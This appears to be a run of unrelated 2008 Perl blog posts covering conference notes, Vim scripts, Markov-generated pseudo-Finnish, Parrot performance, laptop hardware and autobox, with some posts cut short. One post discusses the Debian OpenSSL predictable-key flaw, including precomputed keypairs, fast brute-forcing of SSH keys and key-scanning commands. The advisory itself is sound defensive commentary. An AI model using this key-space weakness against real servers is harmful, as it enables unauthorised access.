Larry Wall "Standards are meant to be broken" - A typical Larry talk, this covered many things including names, names dispatch at compile time, short names and long names. Not about the language, but more about the parser. Perl6 grammar is flexible and Perl has no core, no operators, no language, "I've been working on a "longest token matcher" for the last year", JIT lexer per language. "Perl 6 is designed to extensible, so please embrace it and extend it".
Kang-min Liu "Continuous testing". Eclipse plugin for java that runs JUnit led Test::Continuous, which checks the files you have modified and runs the appropriate tests. CPANFTW: File::Modified, Module::ExtractUse, App::Prove, Log::Dispatch.
Jose Castro "Perl Black Magic - Obfuscation, Golfing and Secret Operators in Perl" is still a very amusing talk on how to scare people.
Lunch! Sandwiches were provided, but I escaped for katsu-don nearby. Tasty!
Ingy dot Net "JavaScript Love for Perl Hackers" covered many topics: vroom - vim love for perl hackers. pQuery - jQuery in Perl (has one thing that jQuery will never have - Perl!). something to learn Taiwanese. JS.pm - storing JavaScript in CPAN.
Leon Brocard "Working in the cloud". Hey, that's my talk, and I managed to pull it off with only one line of Perl code in the whole slide deck. See the slides.
Jesse Vincent "Step 3: Prophet - A peer to peer replicated property database" was a very interesting talk and a little bit of a reply to mine. Prophet is the cool part, and as an example application there is a p2p bug tracker called sd. The hard part is self-healing conflict resolution. "svk for bigtracking". "private social networking". "Jifty, Catalyst, Rails models in future".
Chia-liang Kao "Running Perlish Small Business with Perl" was great. He made individualised buttons for OSDC.tw in Cairo. "Mass customisation". Perl hacking to make businesses run.
Makoto Kuwata "The Fastest Template Engine in the Perl World". Tenjin. Compiles to Perl templates because the templates are Perl.
Lightning talks were very amusing (and harder to write up).
Jonathan Rockway "String::TT". String overloading. Excellent.
"i love money!" yapc asia finances finances over time, -2 million yen before yapc::asia last year. 2008: positive all the time, up to 2 million yen before conference
Daisuke Murase "Open Fastladder with Plagger" - popular web-based rss reader on your computer
"How many cpan authors are there now?". Annual nipotan contest. Best kwalitee Japanese CPAN author. Acme::CPANAuthors
Takeu Inoue "Developing Amazon's dynamo in POE and Erlang" - kai, yet another Amazon Dynamo. obra: "Actually, writing a new database is totally the new writing a new VCS"
Perlmachine: a Perl OS, including a Perl floppy driver. He will write a multitasking version.
Text::MicroMason (::SafeServerPage)
yusukebe "WebService::Simple" - to return cute photos of cats
ingy: vroom -vroom Vroom::Vroom / zhong shell
clkao "Prototype::Signatures" - how hard could it be? B::Scared. Hacks the parser. Faster than normal sub!
takesake "HTML Binary Hacks - GIF98a Polyglot" Detecting browser by how it parses HTML without JavaScript or CSS hacks. JavaScript in GIF, Perl in GIF
The band-aid itself is circular, about 1.5 cm in diameter. It is sealed between two pieces of paper, each about an inch square, that have been glued together along the four pairs of edges. There is a flap at one edge that you pull, and then you can peel the two glued-together pieces of paper apart to get the band-aid out.
As I peeled apart the two pieces of paper in the dark, there was a thin luminous greenish line running along the inside of the wrapper at the place the papers were being pulled away from each other. The line moved downward following the topmost point of contact between the papers as I pulled the papers apart. It was clearly visible in the dark.
I've never heard of anything like this; the closest I can think of is the thing about how wintergreen Life Savers glow in the dark when you crush them.
My best guess is that it's a static discharge, but I don't know. I don't have pictures of the phenomenon itself, and I'm not likely to be able to get any. But the band-aids look like this:
Have any of my Gentle Readers seen anything like this before? A cursory Internet search has revealed nothing of value.
I don't particularly like the way vim's grep works. It's slow, jumps to the first match (you can suppress this) and generally just doesn't behave the way I want it to behave. I want to search, automatically jump to the first match if only one file is found or get a list of files and choose one to edit. I tried egrep, but was getting strange "too many files" errors, so I switched to ack and everything magically worked (I've no idea why).
noremap <silent> <leader>g :call MyGrep("lib/")<cr>
noremap <silent> <leader>G :call MyGrep("lib/ t/ aggtests/ deps_patched/")<cr>
noremap <silent> <leader>f :call MyGrep("lib/", expand('<cword>'))<cr>
function! MyGrep(paths, ...)
    let pattern = a:0 ? a:1 : input("Enter pattern to search for: ")
    if !strlen(pattern)
        return
    endif
    let command = 'ack "' . pattern . '" ' . a:paths . ' -l'
    let bufname = bufname("%")
    let result  = filter(split( system(command), "\n" ), 'v:val != "'.bufname.'"')
    let lines   = []
    if !empty(result)
        if 1 == len(result)
            let file = 1
        else
            " grab all the filenames, skipping the current file
            let lines = [ 'Choose a file to edit:' ]
                \ + map(range(1, len(result)), 'v:val .": ". result[v:val - 1]')
            let file = inputlist(lines)
        endif
        if
            \ ( file > 0 && len(result) > 1 && file < len(lines) )
            \ ||
            \ ( 1 == len(result) && 1 == file )
            execute "edit +1 " . result[ file - 1 ]
            execute "/\\v" . pattern
        endif
    else
        echomsg("No files found matching pattern: " . pattern)
    endif
endfunction
The main drawback is that vim and perl regular expressions aren't compatible (I don't have perl integration in this vim). The '\v' switch mitigates some of the pain, but I think a primitive regex transformation tool might alleviate more of it.
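Such a tool could start very small. A deliberately primitive sketch, assuming we only care about two of the most common differences between Perl regexes and Vim's \v (very magic) syntax:

# Hypothetical, deliberately primitive Perl-to-Vim regex translator.
# Handles only two differences; a real tool would need an actual parser.
sub perl2vim {
    my ($pattern) = @_;

    # Characters that are literal in Perl but special in \v mode.
    $pattern =~ s/([<>=%@&~])/\\$1/g;

    # Perl's non-capturing group (?:...) is %(...) in Vim.
    $pattern =~ s/\(\?:/%(/g;

    return '\v' . $pattern;
}

print perl2vim('(?:foo|bar)=\d+'), "\n";   # prints: \v%(foo|bar)\=\d+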
Update: Now attempts to skip the current file in the buffer. Not really needed, but when you have two files with the thing you're searching for and you're in one, it will automatically jump to the other. I've found this common enough that it seems an obvious use case.
A quick onigiri for breakfast and the largest YAPC so far begins, with 435 attendees.
Follow the conference on live.yapcasia.org.
Yesterday was the day before YAPC::Asia 2008 Tokyo, and it was an evening of overflow talks, which also happened to have free beer and weird snacks.
It started off with the Soozy Conference. It began with a talk on scaffolding, which was really about thousands of lines of XML, Flex, and generating server-side Java based upon HTML.
Then there were a few lightning talks, about lift, a Scala web framework (Scala is the future), a geek magician with his playing card scanner beta, and yet another web application framework (it's too hard to write a WAF, so they spun out HTTP::Engine and HTTPx::Dispatcher). There was a quick presentation on HTTP::Engine (id:dropdb, "middleware is not a cool name") and a great Flash animation about Perl.
Then it was time for RejectConf, with talks about jQuery internals, higher-order JavaScript (wait, this is a Perl conference?) and a talk about Devel::DFire (something like DTrace for Perl).
An excellent beginning.
Of the various comments I received, perhaps the most interesting was from Ilmari Vacklin. ("Vacklin", huh? If my program had generated "Vacklin", the Finns would have been all over the error.) M. Vacklin pointed out that a number of words in my sample output violated the Finnish rules of vowel harmony.
(M. Vacklin also suggested that my article must have been inspired by this comic, but it wasn't. I venture to guess that the Internet is full of places that point out that you can manufacture pseudo-Finnish by stringing together a lot of k's and a's and t's; it's not that hard to figure out. Maybe this would be a good place to mention the word "saippuakauppias", the Finnish term for a soap-dealer, which was in the Guinness Book of World Records as the longest commonly-used palindromic word in any language.)
Anyway, back to vowel harmony. Vowel harmony is a phenomenon found in certain languages, including Finnish. These languages class vowels into two antithetical groups. Vowels from one group never appear in the same word as vowels from the other group. When one has a prefix or a suffix that normally has a group A vowel, and one wants to join it to a word with group B vowels, the vowel in the suffix changes to match. This happens a lot in Finnish, which has a zillion suffixes. In many languages, including Finnish, there is also a third group of vowels which are "neutral" and can be mixed with either group A or with group B.
Modern Korean does not have vowel harmony, mostly, but Middle Korean did have it, up until the early 16th century. The Korean alphabet was invented around 1443, and the notation for the vowels reflected the vowel harmony:
[Illustration: the Middle Korean vowel letters]
The first four vowels in this illustration, with the vertical lines, were incompatible with the second four vowels, the ones with the horizontal lines. The last two vowels were neutral, as was another one, not shown here, which was written as a single dot and which has since fallen out of use. Incidentally, vowel harmony is an unusual feature of languages, and its presence in Korean has led some people to suggest that it might be distantly related to Turkish.
The vowel harmony thing is interesting in this context for the following reason. My pseudo-Finnish was generated by a Markov process: each letter was selected at random so as to make the overall frequency of the output match that of real Finnish. Similarly, the overall frequency of two- and three-letter sequences in pseudo-Finnish should match that in real Finnish. Is this enough to generate plausible (although nonsensical) Finnish text? For English, we might say maybe. But for Finnish the answer is no, because this process does not respect the vowel harmony rules. The Markov process doesn't remember, by the time it gets to the end of a long word, whether it is generating a word in vowel category A or B, and so it doesn't know which vowels it should be generating. It will inevitably generate words with mixed vowels, which is forbidden. This problem does not come up in the generation of pseudo-English.
None of that was what I was planning to write about, however. What I wanted to do was to present samples of pseudo-Finnish generated with various tunings of the Markov process.
The basic model is this: you choose a number N, say 2, and then you look at some input text. For each different sequence of N characters, you count how many times that sequence is followed by "a", how many times it is followed by "b", and so on.
Then you start generating text at random. You pick a sequence of N characters arbitrarily to start, and then you generate the next character according to the probabilities that you calculated. Then you look at the last N characters (the last N-1 from before, plus the new one) and repeat. You keep doing that until you get tired.
For example, suppose we have N=2. Then we have a big table whose keys are 2-character strings like "ab", and then associated with each such string, a table that looks something like this:
| r | 54.52 |
| a | 15.89 |
| i | 10.41 |
| o | 7.95 |
| l | 4.11 |
| e | 3.01 |
| u | 1.10 |
| space | 0.82 |
| : | 0.55 |
| t | 0.55 |
| , | 0.27 |
| . | 0.27 |
| b | 0.27 |
| s | 0.27 |
Whether to count capital letters as the same as lowercase, and what to do about punctuation and spaces and so forth, are up to the designer.
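The whole process fits comfortably in a page of Perl. A minimal sketch of the generator just described (simplified; the program that produced the samples below surely differs in its details):

#!/usr/bin/perl
# Order-N Markov text generator, as described above (a simplified sketch).
use strict;
use warnings;

my $N = 2;                          # length of the context window
my $text = do { local $/; <> };     # slurp the input corpus

# For every N-character sequence, count which character follows it.
my %freq;
for my $i (0 .. length($text) - $N - 1) {
    $freq{ substr($text, $i, $N) }{ substr($text, $i + $N, 1) }++;
}

# Weighted random choice from a { char => count } table.
sub pick {
    my ($table) = @_;
    my $total = 0;
    $total += $_ for values %$table;
    my $roll = rand($total);
    for my $char (keys %$table) {
        return $char if ($roll -= $table->{$char}) < 0;
    }
}

# Start from an arbitrary context and generate until we get tired.
my $context = substr($text, 0, $N);
print $context;
for (1 .. 500) {
    last unless $freq{$context};
    my $next = pick($freq{$context});
    print $next;
    $context = substr($context, 1) . $next;    # slide the window along
}
print "\n";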
Here, as examples, are some samples of pseudo-English, generated with various N. The input text was the book of Genesis, which is not entirely typical. In each case, I deleted the initial N characters and the final partial word, cleaned up the capitalization by hand, and appended a final period.
I have prepared samples of pseudo-Finnish of various qualities. The input here was a bunch of text I copied out of Finnish Wikipedia. (Where else? If you need Finnish text in 1988, you get it from the Usenet fi.talk group; if you need Finnish text in 2008, you get it from Finnish Wikipedia.) I did a little bit of manual cleanup, as with the English, but not too much.
I must say that I found "yhdysvalmistämistammonit" rather far-fetched, even in Finnish. But then I discovered that "yhdeksänkymmenvuotiaaksi" and "yhdysvalloissakaan" are genuine, so who am I to judge?
The next monthly Parrot release will take place next Tuesday, 20 May 2008. In preparation for the release, we're holding yet another monthly Bug Day, all day Saturday 17 May. Parrot hackers, contributors, fans, and hangers-on will gather in #parrot on irc.perl.org to discuss proposed patches, verify and close bugs, and help potential new contributors download, configure, build, and understand Parrot and languages hosted in the Parrot repository. If you're interested in Parrot, have some free time, and want to get your hands a little bit dirty with code, please join us. You don't need to know how to program C or PIR or even Perl 5, but knowing how to download code from a public Subversion repository and build a C program will be very helpful.
Constantly I'll find myself working with DBIx::Class and I want to see the underlying table structure. So I exit my editor, fire up mysql, sob quietly, and type "show create table $some_table". Now I don't have to -- except for the sobbing part.
Make sure you have filetype plugin on in your .vimrc and in your .vim/ftplugin/perl.vim file add the following code (replacing the variables in the beginning of the function, of course):
noremap T :call ShowCreateTable(expand("<cword>"))<cr>
function! ShowCreateTable(class_segment)
    " replace these values with whatever your system needs
    let dbic_base = "My::Schema::"
    let host = "localhost"
    let port = 3306
    let user = "someuser"
    let pass = "somepass"
    let db = "somedatabase"

    let class = dbic_base . a:class_segment
    let table = system("perl -M". class ." -e 'print ". class ."->table'")
    let create = system(
        \ "mysql -h".host.
        \ " -P" .port.
        \ " -u" .user.
        \ " -p" .pass.
        \ " " .db.
        \ " -e 'show create table ".table."'"
        \ )
    echo substitute(create, "\\\\n", "\n", "g")
endfunction
Then, when I see stuff like this:
$schema->resultset('MasterBrand')->find_or_create({ ...
I just position my cursor on the MasterBrand word, type 'T' and it automatically shows the "create table" statement.
Of course, if you don't want to create a .vim/ftplugin/perl.vim file (you should, but you don't have to :), then you could drop the function in your .vimrc and add the following:
filetype plugin on
au! FileType perl :noremap T :call ShowCreateTable(expand("<cword>"))<cr>
After a lot of aggressive work improving our test suite performance, adding 50% more tests has tremendously slowed us down.
All tests successful.
Files=48, Tests=14025, 1386 wallclock secs ( 3.06 usr 0.46 sys + 1035.71 cusr 42.77 csys = 1082.00 CPU)
Result: PASS
Number of test programs: 48
Total runtime approximately 23 minutes 5 seconds
Ten slowest tests:
+---------+-----------------------------------+
| Time | Test |
+---------+-----------------------------------+
| 13m 25s | t/acceptance.t |
| 5m 36s | t/aggregate.t |
| 0m 36s | t/standards/use.t |
| 0m 24s | t/system/both/import/log/pager.t |
| 0m 20s | t/system/both/import/log/search.t |
| 0m 11s | t/system/both/import/log/log.t |
| 0m 11s | t/unit/db/migrations.t |
| 0m 11s | t/unit/fip/record-changes.t |
| 0m 10s | t/unit/piptest/pprove/testdb.t |
| 0m 9s | t/test_class_tests.t |
+---------+-----------------------------------+
(Note that the acceptance and aggregate tests together encompass the vast majority of those 14,000 tests, and simple aggregation is no longer a win.)
Since we're running at roughly 10 tests a second, I started paying attention to where we can gain wins and it looks like XML::XPath is a likely candidate for performance improvements. In fact, the code has a number of areas where it could be improved substantially. It's not been updated in years and I've contacted Matt Sergeant about having a colleague take it over. This could also be an excellent opportunity to pay attention to its RT queue.
$ dprofpp
Total Elapsed Time = 35.55858 Seconds
User+System Time = 13.44858 Seconds
Exclusive Times
%Time ExclSec CumulS #Calls sec/call Csec/c Name
3.32  0.446   0.655   39692  0.0000   0.0000 <anon>:/home/poec01/trunk/deps/lib/perl5//XML/XPath/XMLParser.pm:63
2.94  0.395   1.373    5544  0.0001   0.0002 XML::XPath::XMLParser::parse_start
2.35  0.316   0.385   20180  0.0000   0.0000 <anon>:/home/poec01/trunk/deps/lib/perl5//XML/XPath/Node.pm:236
2.04  0.275   3.025   30768  0.0000   0.0001 <anon>:/opt/csw/lib/perl/site_perl/XML/Parser.pm:187
1.84  0.248   1.229   19680  0.0000   0.0001 XML::XPath::XMLParser::parse_char
1.84  0.247   0.247   48278  0.0000   0.0000 Class::Accessor::Grouped::get_simple
1.83  0.246   0.598   20196  0.0000   0.0000 <anon>:/home/poec01/trunk/deps_patched/lib/Test/XML/XPath.pm:67
1.80  0.242   0.337   19252  0.0000   0.0000 Class::Accessor::Grouped::get_inherited
1.50  0.202   0.202   11760  0.0000   0.0000 XML::XPath::XMLParser::_namespace
1.42  0.191   1.113   11136  0.0000   0.0001 XML::XPath::Node::ElementImpl::DESTROY
1.32  0.178   0.178   11200  0.0000   0.0000 XML::XPath::Node::ElementImpl::getAttributes
1.28  0.172   0.418    1361  0.0001   0.0003 DBIx::Class::ResultSet::new
1.23  0.166   0.869     549  0.0003   0.0016 base::import
1.22  0.164   0.362   13872  0.0000   0.0000 XML::XPath::Node::ElementImpl::appendChild
1.20  0.162   3.187      24  0.0068   0.1328 XML::Parser::Expat::ParseString
Just that list above shows that almost 16% of our time is spent in XML::XPath.
A few more minutes on the train and I have a tag cloud added to this Perl blog.
Apparently I wrote this a long time ago, as Ubuntu 8.04 has just come out and I am about to upgrade my notebook. Anyway, as I am on a train now and have nothing better to do than cleaning up old, half-written posts, I am adding this too. Better than throwing it away, I think.
After my Dell notebook broke down I bought an HP nc6400 to work on and use during trainings. It says HP on the top of the notebook, but next to the screen it says Compaq nv6400. When will they make up their mind whether they are called HP or Compaq?
Anyway the notebook looks very nice. I installed Ubuntu 6.10 on it from CD and as 7.04 beta just came out I decided to try that and upgraded vi the network upgrade. Everything went very well and most of the hardware I tried works well.
The main problem I encountered is that I am using a Samsung SyncMaster 731b external monitor (connected via the standard HP docking station I bought with the notebook) but I could not yet figure out how to configure the screen so can see the full display on either the internal screen or on the external.
The same goes with overhead projectors. I tried one during a Perl Mongers meeting and it was a disaster. The left 20% of the picture showed up on the right side of the screen.
This is the output of lspci:
00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS/940GML and 945GT Express Memory Controller Hub (rev 03)
00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS/940GML Express Integrated Graphics Controller (rev 03)
00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/940GML Express Integrated Graphics Controller (rev 03)
00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 01)
00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 01)
00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 01)
00:1c.3 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 4 (rev 01)
00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #1 (rev 01)
00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #2 (rev 01)
00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #3 (rev 01)
00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI #4 (rev 01)
00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 01)
00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e1)
00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 01)
00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) Serial ATA Storage Controller IDE (rev 01)
02:06.0 CardBus bridge: Texas Instruments PCIxx12 Cardbus Controller
02:06.2 Mass storage controller: Texas Instruments 5-in-1 Multimedia Card Reader (SD/MMC/MS/MS PRO/xD)
02:06.3 Generic system peripheral [0805]: Texas Instruments PCIxx12 SDA Standard Compliant SD Host Controller
02:06.4 Communication controller: Texas Instruments PCIxx12 GemCore based SmartCard controller
08:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5753M Gigabit Ethernet PCI Express (rev 21)
10:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)
For the first time in the USA, I am going to teach a shortened version of my Test automation using Perl course. It will take place along the other master classes on June 19-20, 2008, the two days right after YAPC::NA.
Thanks to brian d foy, who organizes these master classes, people can already register.
brian also told me that I should take care of all the promotion, so I have already posted about it on use.perl.org and I have put a link about it on CPAN::Forum. Later I think I'll buy some advertisements on Google as well.
To add more to the promotion, I should also say that this is quite a rare opportunity: as far as I know there is no one else teaching such a course, and I don't know when I am going to be able to teach it again in the US. In addition, the idea behind the master classes is that you can learn this stuff at a fraction of the normal cost of the courses. They are given at such a price partially as a promotion for YAPC itself.
I am getting more and more into this tagging business. I am using del.icio.us to manage my bookmarks, and I should further improve the tags on CPAN::Forum as well.
So I thought it might be time to add tags to the blog too, and as I am impulsive about this stuff, I added the code to display tags. It really only took about 40 minutes, and half of it was on my train ride from Tel Aviv to Modiin.
Today's Rakudo-building speedup is 27.79%.
(Okay, the other slow part of Rakudo builds 17.59% faster. Still.)
The profile showed that string allocation was a hotspot in the benchmark. In particular, the part of Parrot which allocates memory out of arenas spent a lot of time performing garbage collection. Every time you can avoid either allocating unnecessary memory or running a full garbage collection, you can improve performance.
Parrot r27484 adds one line of code (and one line of comment).
Every time mem_allocate() successfully allocates a new block, it increments a counter. Whenever the garbage collector performs a full run, it resets that counter to zero.
This patch performs a garbage collection run from mem_allocate() only if that counter is non-zero. That is, if the garbage collector has already run, it's already found as much free arena memory as possible. (This is not memory for PMCs or STRING headers; this is buffer memory.) Running the GC again won't find any more free buffer memory. In that case, skipping the GC run and allocating more memory from the OS gives the performance improvement.
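In Perl pseudocode (Parrot itself is C, and every name below is invented for illustration, not Parrot's real identifiers), the guard amounts to something like this:

#!/usr/bin/perl
# Illustrative paraphrase of the r27484 guard; not Parrot's actual code.
use strict;
use warnings;

my $blocks_since_last_gc = 0;

sub run_full_gc {
    # stop-the-world mark and sweep (stubbed out here)
    $blocks_since_last_gc = 0;    # a full run resets the counter
}

sub mem_allocate {
    my ($size) = @_;
    if ($blocks_since_last_gc != 0) {
        # Something has been allocated since the last run, so a GC
        # might reclaim buffer memory; run it (and retry the arenas).
        run_full_gc();
    }
    # The GC has already run and we still need memory, so ask the OS
    # for a fresh block and count it.
    $blocks_since_last_gc++;
    return "\0" x $size;
}

mem_allocate(64) for 1 .. 3;    # only the second and third calls trigger a GC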
I should note that my comments about avoiding memory allocation apply in the general case. Parrot's current GC has some limitations. The biggest is that it stops the world to mark and sweep everything. The new GC Andrew Whitworth will implement as part of the Google Summer of Code will fix that. As well, we have some ideas to improve the implementation such that the GC will become even less expensive than it is now. Then we'll see algorithmic improvements that make even this 27.79% optimization seem small.
But around that time the Internet was just beginning to get into full swing. The Finnish government was investing a lot of money in networking infrastructure, and a lot of people in Finland were starting to appear on the Internet.
I have a funny story about that: Around the same time, a colleague named Marc Edgar approached me in the computer lab to ask if I knew of any Internet-based medium he could use to chat with his friend at the University of Oulu. I thought at first that he was putting me on (and maybe he was) because in 1989 the University of Oulu was just about the only place in the world where a large number of people were accessible via internet chat, IRC having been invented there the previous autumn.
A new set of Finnish-language newsgroups had recently appeared on Usenet, and people posted to them in Finnish. So I had access to an unlimited supply of computer-readable Finnish text, something which would have been unthinkable a few years before, and I could do the experiment in Finnish.
I wrote up the program, which is not at all difficult,
gathered Finnish news articles, and produced the following sample:
Uttavalon estaa ain pahalukselle? Min omatunu selle menneet hy, toista. Palveljen alh tkö an välin oli ei alkohol pisten jol elenin. Että, ille, ittavaikki oli nim tor taisuuristä usein an sie a in sittä asia krista sillo si mien loinullun, herror os; riitä heitä suurinteen palve in kuk usemma. Tomalle, äs nto tai sattia yksin taisiä isiäk isuuri illää hetorista. Varsi kaikenlaineet ja pu distoja paikelmai en tulissa sai itsi mielim ssän jon sn ässäksi; yksen kos oihin! Jehovat oli kukahdol ten on teistä vak kkiasian aa itse ee eik tse sani olin mutta todistanut t llisivat oisessa sittä on raaj a vaisen opinen. Ihmisillee stajan opea tajat ja jumalang, sitten per sa ollut aantutta että voinen opeten. Ettuj, jon käs iv telijoitalikantaminun hä seen jälki yl nilla, kkeen, vaaraajil tuneitteistamaan same?
In those days, the world was 7-bit, and Finnish text was posted in a Finnish national variant of ASCII that caused words like "tkö an välin" to look like "tk| an v{lin". The presence of the curly braces heightened the apparent similarity, because that was all you could see at first glance.
At the time I was pleased, but now I think I see some defects. There are some vowelless words, such as "sn" and "t", which I don't think happen in Finnish. Some other words look defective: "ssän" and "kkeen", for example. Also, my input sample wasn't big enough, so once the program generated "alk" it was stuck doing the rest of "alkohol". Still, I think this could pass for Finnish if the reader wasn't paying much attention. I was satisfied with the results of the experiment, and was willing to believe that randomly-constructed English really did look enough like English to fool a non-English-speaking observer.
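For the curious, the program really is short. The original code isn't shown here, so this is a hypothetical reconstruction of a letter-trigram generator: pick each next character at random from the characters that followed the current two-letter window somewhere in the input.

#!/usr/bin/perl
# Hypothetical reconstruction; run as: perl trigram.pl finnish_articles.txt
use strict;
use warnings;

my $corpus = do { local $/; <> };   # slurp the input articles
$corpus =~ s/\s+/ /g;               # fold whitespace

# Map each two-character window to the characters that followed it.
my %next;
for my $i ( 0 .. length($corpus) - 3 ) {
    push @{ $next{ substr $corpus, $i, 2 } }, substr $corpus, $i + 2, 1;
}

# Walk: emit a random continuation, then slide the window one character.
my $window = substr $corpus, 0, 2;
print $window;
for ( 1 .. 500 ) {
    my $followers = $next{$window} or last;
    my $char = $followers->[ rand @$followers ];
    print $char;
    $window = substr( $window, 1 ) . $char;
}
print "\n";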
[ Addendum 20080514: There is a followup to this article. ]
via Reddit, this Debian Security announcement:
‘Luciano Bello discovered that the random number generator in Debian’s openssl package is predictable. This is caused by an incorrect Debian-specific change to the openssl package (CVE-2008-0166). As a result, cryptographic key material may be guessable.
It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8c-1 on Debian systems (ie since 2006! –jm) is recreated from scratch. Furthermore, all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised; the Digital Signature Algorithm relies on a secret random value used during signature generation.’
and, of course, here’s the Ubuntu Security Notice for the hole:
Who is affected
Systems which are running any of the following releases:
- Ubuntu 7.04 (Feisty)
- Ubuntu 7.10 (Gutsy)
- Ubuntu 8.04 LTS (Hardy)
- Ubuntu “Intrepid Ibex” (development): libssl <= 0.9.8g-8
- Debian 4.0 (etch) (see corresponding Debian security advisory)
and have openssh-server installed or have been used to create an OpenSSH key or X.509 (SSL) certificate. All OpenSSH and X.509 keys generated on such systems must be considered untrustworthy, regardless of the system on which they are used, even after the update has been applied. This includes the automatically generated host keys used by OpenSSH, which are the basis for its server spoofing and man-in-the-middle protection.
It was apparently caused by this incorrect “fix” applied by the Debian maintainers to their package. One wonders why that fix never made it upstream.
Bad news….
Update: Ben Laurie tears into Debian for this:
What can we learn from this? Firstly, vendors should not be fixing problems (or, really, anything) in open source packages by patching them locally - they should contribute their patches upstream to the package maintainers. Had Debian done this in this case, we (the OpenSSL Team) would have fallen about laughing, and once we had got our breath back, told them what a terrible idea this was. But no, it seems that every vendor wants to “add value” by getting in between the user of the software and its author.
+1!
For what it’s worth, we in Apache SpamAssassin work closely with our Debian packaging team, tracking the debbugs traffic for the spamassassin package, and one of the Debian packagers is even on the SpamAssassin PMC. So that’s one way to reduce the risk of upstream-vs-package fork bugs like this, since we’d have spotted that change going in, and nixed it before it caused this failure.
Here’s a question: should the OpenSSL dev team have monitored the bug traffic for Debian and the other packagers? Do upstream developers have a duty to monitor downstream changes too?
This comment puts it a little strongly, but is generally on the money in this regard:
the important part for OpenSSL is to find a way to escape the blame for their fuck-up. They failed to publish the correct contact address for such important questions regarding OpenSSL. Branden (another commenter –jm) noted that the mail address mentioned by Ben is not documented anywhere. It is OpenSSL’s responsibility that they allowed the misuse of openssl-dev for offtopic questions and then silently moving the dev stuff to a secret other list nobody outside OpenSSL knew about.
I’m sure Debian is willing to take their fair share of the blame if OpenSSL finally admits that their mistake played a major role here as well. After all the Debian maintainer might have misrepresented the nature of his plans, but he gave warning signs and said he was unsure. But as it appears now all the people who might have noticed secretly left openssl-dev, the documented place for that kind of questions. This is hardly the fault of the maintainer.
Update 2: this Reddit comment explains the hole in good detail:
Valgrind was warning about uninitialized data in the buffer passed into ssleay_rand_bytes, which was causing all kinds of problems using Valgrind. Now, instead of just fixing that one use, for some reason, the Debian maintainers decided to also comment out the entropy mixed in from the buffer passed into ssleay_rand_add. This is the very data that is supposed to seed the random number generator; this is the actual data that is being used to provide real randomness as a seed for the pseudo-random number generator. This means that pretty much all data generated by the random number generator from that point forward is trivially predictable. I have no idea why this line was commented out; perhaps someone, somewhere, was calling it with uninitialized data, though all of the uses I’ve found were with initialized data taken from an appropriate entropy pool.
So, any data generated by the pseudo-random number generator since this patch should be considered suspect. This includes any private keys generated using OpenSSH on affected Debian systems. It also includes the symmetric keys that are actually used for the bulk of the encryption.
A pretty major fuck-up, all told.
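To make the failure mode concrete, here is a toy illustration in Perl. This is not OpenSSL's code; it just shows why a seed that reduces to the process ID is fatal, since a PID has at most 32768 possible values.

#!/usr/bin/perl
# Toy illustration only; OpenSSL's RNG is far more elaborate. The point:
# if the seed reduces to the PID, identical PIDs yield identical "keys".
use strict;
use warnings;

sub crippled_key_material {
    my ($pid) = @_;
    srand($pid);    # stand-in for seeding with nothing but the PID
    return join '', map { sprintf '%02x', int rand 256 } 1 .. 16;
}

print crippled_key_material(12345), "\n";
print crippled_key_material(12345), "\n";   # same PID, same "key"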
Update 3: Here’s a how-to page on wiki.debian.org put together by the folks from the #debian IRC channel. It has how-to information on testing your keys for vulnerability using a script called ‘dowkd.pl’, details of exactly what packages and keys are vulnerable, and instructions on how to regenerate keys in each of the (many) affected apps.
It notes this about Apache2 SSL keys:
According to folks in #debian-security, if you have generated an SSL key (normally the step just prior to generating the CSR, and then sending it off to your SSL certificate provider), then the certificate should be considered vulnerable.
So, bad news — SSL keys will need to be regenerated. Add ‘costly’ to the list of downsides. (Yet another update: this hasn’t turned out quite that badly after all — many CAs are now offering free reissuance of affected certs.)
Looking at ‘dowkd.pl’, it gets even worse for ssh users. It appears the OpenSSH packages on affected Debian systems could generate only one of 262148 distinct keypairs. Obviously, this is trivial to brute-force. With a little precomputation (which would take only 14 hours on a single desktop!), an attacker can generate all of those keypairs, and write a pretty competent SSH worm. :(
Update: voila, precomputed keypairs, and figures on the viability of remote brute-forcing the keyspace in 11 minutes.
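Returning to that dowkd.pl script: as I recall it could scan both local key files and remote hosts, roughly like the lines below — treat the exact invocation as an assumption and check the wiki page itself before relying on it.

$ perl dowkd.pl file ~/.ssh/id_dsa.pub    # check a local public key
$ perl dowkd.pl host example.org          # scan a host's SSH keys over the network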
Read more of this story at use Perl.
The autobox pragma first showed up a few years ago. It lets you do something
like this:
use autobox;
[ qw(wonderful is very autobox) ]
->sort->map(sub { ucfirst })->join(q{ })->print;
...to print: Autobox Is Very Wonderful
At first, it was pretty neat, but it required patches to perl. By 2005, it had been rewritten to require no patch, but was still pretty scary and experimental, at least to me. Over the last few years, I've looked over toward autobox a few times, itching to use it all over the place, but never quite willing to do so because of a few significant limitations.
First of all, this didn't work: $array_ref->$method_name
Method names needed to be literals, meaning that it was more difficult to pick a method at runtime with autoboxed values than with standard objects.
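With that first fix in place, a sketch like this now works (hedged; it assumes Moose::Autobox to supply the Array methods):

use Moose::Autobox;

my $aref   = [ 3, 1, 2 ];
my $method = 'sort';                           # chosen at runtime
print join( ' ', @{ $aref->$method } ), "\n";  # 1 2 3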
More importantly, this didn't work: @array->method
This was important because this wouldn't work either: \@array->method
